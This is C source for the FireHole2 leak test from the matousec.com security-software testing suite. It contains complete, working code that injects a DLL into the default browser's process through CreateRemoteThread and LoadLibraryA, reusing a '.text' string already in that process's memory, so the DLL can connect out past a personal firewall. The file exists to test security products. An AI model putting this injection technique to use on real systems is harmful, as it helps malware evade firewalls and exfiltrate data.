/*

 Security Software Testing Suite - FireHole2 (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Method description:

   * Windows API CreateRemoteThread allows applications to create new threads in other processes.
     This can be used for implementing well known DLL injection.

   * The common DLL injection using CreateRemoteThread firstly writes a name of the DLL
     to the remote process and then creates a new thread in the target process so that
     it executes LoadLibraryA API function with the name of the DLL, which was written to the process memory,
     as an argument.

   * The implementation of this test does not need to write the name of the DLL to the target process
     memory because it uses strings that already are in the target process memory.

   * "fireholedll.dll" is copied to the directory of the target process under new name ".text" and using
     CreateRemoteThread pointed to LoadLibraryA call it is loaded to the target process memory,
     in which its code attempts to connect to the Internet server.

   * The target process in this test is the default browser's process.

*/


#include <stdio.h>
#include <windows.h>
#include "include/common.h"
#include "include/common-leak.h"
#include "include/common-hook.h"


int main(int argc,char *argv[])
{
  COM_CONF conf;
  if (!com_console_init_main("FireHole2","firehole2",argc,argv,&conf,COM_TEST_TYPE_FIREHOLE2)) return 1;

  char *used_dlls[]={"ntdll.dll","kernel32.dll"};
  if (!com_hook_load_libraries(used_dlls,2)) return 1;

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;
  char *err_prefix=COM_ERR_STANDARD_PREFIX;

  ULONG pid;
  if (com_get_default_browser_pid_wait(&pid,&err_inf))
  {
    if (com_verbosity_get()) printf("The default browser's process found (PID = %ld).\n",pid);

    char browser[MAX_PATH];
    if (com_get_default_browser_path(browser,sizeof(browser),&err_inf))
    {
      void *text_addr=NULL;
      COM_IMAGE_INFO info;
      if (com_get_image_info(browser,&info,&err_inf))
      {
        HANDLE browser_file=CreateFile(browser,GENERIC_READ,FILE_SHARE_READ | FILE_SHARE_WRITE,NULL,
                                       OPEN_EXISTING,0,NULL);
        if (browser_file!=INVALID_HANDLE_VALUE)
        {
          char buf[4096];
          memset(buf,0,sizeof(buf));
          DWORD bytes;
          if (ReadFile(browser_file,buf,sizeof(buf),&bytes,NULL))
          {
            buf[sizeof(buf)-1]='\0';
            for (int i=0;i<sizeof(buf);i++)
            {
              if (!strcmp(&buf[i],".text"))
              {
                text_addr=(void*)((size_t)info.image_base+i);
                break;
              }
            }

            if (!text_addr) com_err_set_nc(&err_inf,"Unable to find \".text\" section header in '%s'.\n",browser);
          } else com_err_set(&err_inf,"Unable to read from file '%s'.\n",browser);

          CloseHandle(browser_file);
        } else com_err_set(&err_inf,"Unable to open file '%s'.\n",browser);

        if (text_addr)
        {
          if (com_verbosity_get()) printf("\".text\" header starts at 0x%p in the target process (PID %lu).\n",text_addr,pid);

          char browser_dir[MAX_PATH];
          lstrcpynA(browser_dir,browser,sizeof(browser_dir));
          char *sl=strrchr(browser_dir,'\\');
          if (sl) *sl='\0';

          char dll_new[MAX_PATH];
          snprintf(dll_new,sizeof(dll_new),"%s\\.text",browser_dir);
          dll_new[sizeof(dll_new)-1]='\0';

          if (CopyFile("fireholedll.dll",dll_new,FALSE))
          {
            if (com_verbosity_get()) printf("File \"fireholedll.dll\" copied to '%s'.\n",dll_new);

            PCOM_MAPPING map=&conf.map;
            if (com_mapping_server_create(map,COM_MAP_DEFAULT_DATA_SIZE_MAX,"FireHole",&conf,sizeof(conf),&err_inf))
            {
              HANDLE proc=OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION,FALSE,pid);
              if (proc)
              {
                if (com_verbosity_get()) printf("Target process (PID %lu) opened.\n",pid);

                HMODULE kernel=GetModuleHandle("kernel32.dll");
                if (kernel)
                {
                  if (com_verbosity_get()) printf("\"kernel32.dll\" found at 0x%p.\n",kernel);

                  void *LoadLibrary_addr=GetProcAddress(kernel,"LoadLibraryA");
                  if (LoadLibrary_addr)
                  {
                    if (com_verbosity_get()) printf("\"LoadLibraryA\" found in \"kernel32.dll\" at 0x%p.\n\n",LoadLibrary_addr);

                    DWORD tid;
                    HANDLE thread=CreateRemoteThread(proc,NULL,0,LoadLibrary_addr,text_addr,0,&tid);
                    if (thread)
                    {
                      if (com_verbosity_get()) printf("New thread (TID %lu) created in process (PID %lu), waiting for response ...\n",tid,pid);

                      DWORD wres=WaitForSingleObject(map->event,30000);
                      switch (wres)
                      {
                        case WAIT_OBJECT_0:
                        {
                          if (map->data->error.occurred)
                          {
                            err_prefix="\nTARGET PROCESS ERROR: ";
                            memcpy(&err_inf,&map->data->error,sizeof(err_inf));
                          } else res=com_find_pattern_and_print_data(map->data->buffer,sizeof(map->data->buffer),&conf,&err_inf);
                          break;
                        }

                        case WAIT_TIMEOUT:
                          com_err_set_nc(&err_inf,"Waiting timed out.\n");
                          break;

                        default:
                          if (wres!=WAIT_FAILED) SetLastError(ERROR_SUCCESS);
                          com_err_set(&err_inf,"Unknown error occurred, WaitForSingleObject returned %ld.\n",wres);
                      }

                      CloseHandle(thread);
                    } else com_err_set(&err_inf,"Unable to create thread in process (PID %lu).\n",pid);
                  } else com_err_set(&err_inf,"Unable to find \"LoadLibraryA\" inside \"kernel32.dll\".\n");
                } else com_err_set(&err_inf,"Unable to find \"kernel32.dll\" in my address space.\n");

                CloseHandle(proc);
              } else com_err_set(&err_inf,"Unable to open process (PID %lu).\n",pid);

              com_mapping_close(map);
            }
          } else com_err_set(&err_inf,"Unable to copy \"fireholedll.dll\" to '%s'.\n",dll_new);
        }
      }
    }
  }

  return com_end_pref(res,&err_inf,&conf,err_prefix);
}
